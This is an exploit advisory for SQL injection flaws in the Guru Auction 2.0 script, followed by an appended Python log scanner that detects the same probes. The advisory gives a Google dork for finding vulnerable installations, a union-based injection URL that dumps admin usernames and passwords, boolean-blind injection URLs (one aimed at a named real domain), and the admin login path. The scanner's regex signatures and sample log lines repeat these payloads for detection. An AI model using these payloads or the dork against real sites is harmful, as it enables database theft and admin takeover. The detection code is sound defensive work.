Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.00
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login page:
~~~~~~~~~~
http://domain.tld/[path]/admin/
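As an added defensive example that is not part of the advisory: a small Python access-log scanner that flags requests to the two affected scripts when their integer-only parameters (cate_id, item_id) carry non-numeric input or match the union-based and boolean-blind payload shapes shown above. The script names and parameter expectations are taken from the PoC URLs; the log lines, hosts and IPs are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the affected scripts expect to be plain integers (assumed from the PoC URLs).
INTEGER_PARAMS = {"subcat.php": {"cate_id"}, "detail.php": {"item_id"}}

# Signatures for the two injection styles in the advisory (case-insensitive).
SIGNATURES = {
    "union-based": re.compile(r"\bunion\b.*\bselect\b|\bgroup_concat\s*\(", re.I),
    "boolean-blind": re.compile(r"\band\b.*\bsubstring\s*\(.*@@version", re.I),
}

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (hypothetical host paths and IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 7120
203.0.113.9 - - [10/Oct/2023:13:55:48 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 6011
203.0.113.9 - - [10/Oct/2023:13:55:49 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 1200
"""


def analyse_request(target: str) -> list:
    """Return sorted findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    expected_int = INTEGER_PARAMS.get(script, set())
    findings = set()
    # parse_qs URL-decodes values and turns '+' into spaces, so "a+AND+b" becomes "a AND b".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name in expected_int and not re.fullmatch(r"-?\d+", value.strip()):
                findings.add(f"non-integer {name}")  # allowlist check catches unknown variants
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.add(label)
    return sorted(findings)


def scan_log(text: str) -> list:
    """Return (ip, target, findings) for every parsable line that triggers a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := analyse_request(m["target"])):
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

The integer allowlist check is the one worth keeping in production; the payload signatures only confirm which technique a probe resembles.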